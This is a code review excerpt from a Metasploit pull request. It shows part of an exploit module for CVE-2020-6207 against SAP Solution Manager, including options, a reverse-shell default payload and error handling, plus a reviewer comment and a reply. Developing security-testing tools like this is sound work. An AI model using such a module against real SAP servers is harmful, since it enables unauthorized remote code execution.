modules/exploits/multi/sap/cve_2020_6207_solman_rs.rb

```diff
@@ -0,0 +1,229 @@
+        },
+        'References' =>
+          [
+            ['CVE', '2020-6207'],
+            ['URL', 'https://i.blackhat.com/USA-20/Wednesday/us-20-Artuso-An-Unauthenticated-Journey-To-Root-Pwning-Your-Companys-Enterprise-Software-Servers-wp.pdf'],
+            ['URL', 'https://github.com/chipik/SAP_EEM_CVE-2020-6207']
+          ],
+        'Privileged' => false,
+        'DefaultOptions' => {
+          'Payload' => 'generic/shell_reverse_tcp'
+        },
+        'Platform' => 'java',
+        'Arch' => ARCH_JAVA,
+        'Targets' => [ ['Automatic', {}] ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2020-10-03'
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(50000),
+        OptString.new('URIPATH', [true, 'Path to the SAP Solution Manager EemAdmin page from the web root', '/EemAdminService/EemAdmin']),
+        OptString.new('AGENT', [true, 'Agent server name for exploitation', 'agent_server_name']),
+      ]
+    )
+    self.class.agents = Array.new
+  end
+
+  class << self
+    attr_reader :agents
+  end
+
+  class << self
+    attr_writer :agents
+  end
+
+  def setup_variables
+    @host = datastore['RHOSTS']
+    @port = datastore['RPORT']
+    @lhost = datastore['LHOST'] || '0.0.0.0'
+    @lport = datastore['LPORT'] || 4444
+    @path = datastore['URIPATH']
+
+    @agent_name = datastore['AGENT']
+    @script_name = Rex::Text.rand_text_alphanumeric(12)
+
+    if datastore['SSL']
+      @schema = 'https://'
+    else
+      @schema = 'http://'
+    end
+
+    @solman_uri = "#{@schema}#{@host}:#{@port}#{@path}"
+  end
+
+  # Analyze runtime error message from SAP Solution Manager client
+  def analyze_error(error_message)
+    case error_message
+    when 'The server not responding'
+      fail_with(Failure::Unreachable, 'The server not responding.')
+    when 'Bad response status code'
+      fail_with(Failure::UnexpectedReply, 'The server sent a response, but the response status code not in the expected status code: 200. The target is likely patched.')
+    when 'Response content type is not text/xml'
+      fail_with(Failure::UnexpectedReply, 'The server sent a response, but the response body not in the expected content type: text/xml. The target is likely patched.')
+    when 'Failed to parse response body'
+      fail_with(Failure::UnexpectedReply, 'The server sent a response, but the response body not in the expected format. The target is likely patched.')
+    when 'Response body does not contain a SOAP body'
+      fail_with(Failure::UnexpectedReply, 'The server sent a response, but the response body does not contain a SOAP body. The target is likely patched.')
+    when 'Response body contains errors'
+      fail_with(Failure::UnexpectedReply, 'The server sent a response, but the response body contains errors.')
+    else
+      fail_with(Failure::UnexpectedReply, 'The server did not respond in the expected manner.')
+    end
+  end
```

Comment:
Same thing here, once `check_response` has been updated this shouldn't be necessary any more.

Reply:
Deleted analyze_error in exploit module: https://github.com/rapid7/metasploit-framework/pull/14924/commits/8c7a483f6e90cf151e3f67442e94ca7cf1f6f98b